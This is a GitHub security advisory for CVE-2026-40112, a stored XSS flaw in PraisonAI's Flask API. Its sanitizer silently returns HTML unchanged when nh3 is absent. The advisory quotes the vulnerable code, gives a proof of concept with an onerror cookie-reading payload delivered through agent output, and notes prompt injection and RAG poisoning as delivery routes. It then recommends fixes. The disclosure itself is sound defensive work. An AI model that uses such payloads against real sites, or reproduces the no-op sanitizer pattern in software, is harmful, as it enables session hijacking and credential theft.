Skip to content

PraisonAI Vulnerable to Stored XSS via Unsanitized Agent Output in HTML Rendering (nh3 Not a Required Dependency)

Moderate severity GitHub Reviewed Published Apr 9, 2026 in MervinPraison/PraisonAI • Updated Apr 10, 2026

Package

pip PraisonAI (pip)

Affected versions

< 4.5.128

Patched versions

4.5.128

Description

Summary

The Flask API endpoint in src/praisonai/api.py renders agent output as HTML without effective sanitization. The _sanitize_html function relies on the nh3 library, which is not listed as a required or optional dependency in pyproject.toml. When nh3 is absent (the default installation), the sanitizer is a no-op that returns HTML unchanged. An attacker who can influence agent input (via RAG data poisoning, web scraping results, or prompt injection) can inject arbitrary JavaScript that executes in the browser of anyone viewing the API output.

Details

In src/praisonai/api.py, lines 6-14 define the sanitizer with a try/except ImportError fallback:

try:
    import nh3
    def _sanitize_html(html: str) -> str:
        return nh3.clean(html)
except ImportError:
    def _sanitize_html(html: str) -> str:
        """Fallback: no nh3, return as-is (install nh3 for XSS protection)."""
        return html

The home() route at lines 21-25 converts agent output to HTML via markdown.markdown() (which preserves raw HTML tags by default) and embeds it in an HTML response using an f-string — bypassing Flask's Jinja2 auto-escaping:

@app.route('/')
def home():
    output = basic()
    html_output = _sanitize_html(markdown.markdown(str(output)))
    return f'<html><body>{html_output}</body></html>'

Since nh3 is not in any dependency list (pyproject.toml core deps, optional deps, or requirements files), a standard installation will always hit the fallback path. The markdown library's default behavior passes through raw HTML tags in input text, so any <script> or event handler attributes in the agent output flow directly into the response.

Additionally, deploy.py:76-91 generates a deployment version of api.py that has no sanitization at all — it directly calls markdown.markdown(output) without any _sanitize_html wrapper.

PoC

  1. Set up a PraisonAI instance with an agent that processes external content (e.g., web scraping or RAG retrieval):
# agents.yaml
framework: crewai
topic: test
roles:
  researcher:
    role: Researcher
    goal: Process user-provided content
    backstory: You process content exactly as given
    tasks:
      process:
        description: "Return this exact text: <img src=x onerror=alert(document.cookie)>"
        expected_output: The text as-is
  1. Verify nh3 is not installed (default):
pip show nh3 2>&1 | grep -c "not found"
# Returns 1 (not installed)
  1. Start the API:
python src/praisonai/api.py
  1. Access the endpoint:
curl http://localhost:5000/
  1. Response contains unsanitized HTML:
<html><body><p><img src=x onerror=alert(document.cookie)></p></body></html>
  1. Opening this in a browser executes the JavaScript payload.

Impact

  • Session hijacking: An attacker can steal cookies or session tokens from users viewing the API output.
  • Credential theft: Injected scripts can present fake login forms or exfiltrate data to attacker-controlled servers.
  • Actions on behalf of users: Malicious JavaScript can perform actions in the context of the victim's browser session.

The attack surface includes any scenario where agent output contains attacker-influenced content: RAG retrieval from poisoned documents, web scraping of malicious pages, processing of adversarial user prompts, or multi-agent communication where one agent's output is tainted.

Recommended Fix

Make nh3 a required dependency when using the API, and remove the silent fallback:

# Option 1: Make nh3 required in pyproject.toml under the "api" optional dependency
# In pyproject.toml:
# api = [
#     "flask>=3.0.0",
#     ...
#     "nh3>=0.2.14",
# ]

# Option 2: Use markdown's built-in HTML stripping as a safe default
import markdown

def _sanitize_html(html: str) -> str:
    try:
        import nh3
        return nh3.clean(html)
    except ImportError:
        import re
        return re.sub(r'<[^>]+>', '', html)  # Strip all HTML tags as fallback

# Option 3 (preferred): Use Flask's Jinja2 templating with auto-escaping
# instead of f-string interpolation, or use markupsafe.escape()
from markupsafe import Markup

@app.route('/')
def home():
    output = basic()
    # Use markdown with safe extensions only
    html_output = markdown.markdown(str(output), extensions=[])
    try:
        import nh3
        html_output = nh3.clean(html_output)
    except ImportError:
        raise RuntimeError("nh3 is required for safe HTML rendering. Install with: pip install nh3")
    return f'<html><body>{html_output}</body></html>'

Also fix deploy.py:76-91 to include sanitization in the generated api.py.

References

@MervinPraison MervinPraison published to MervinPraison/PraisonAI Apr 9, 2026
Published by the National Vulnerability Database Apr 9, 2026
Published to the GitHub Advisory Database Apr 10, 2026
Reviewed Apr 10, 2026
Last updated Apr 10, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(8th percentile)

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

CVE ID

CVE-2026-40112

GHSA ID

GHSA-cfg2-mxfj-j6pw

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.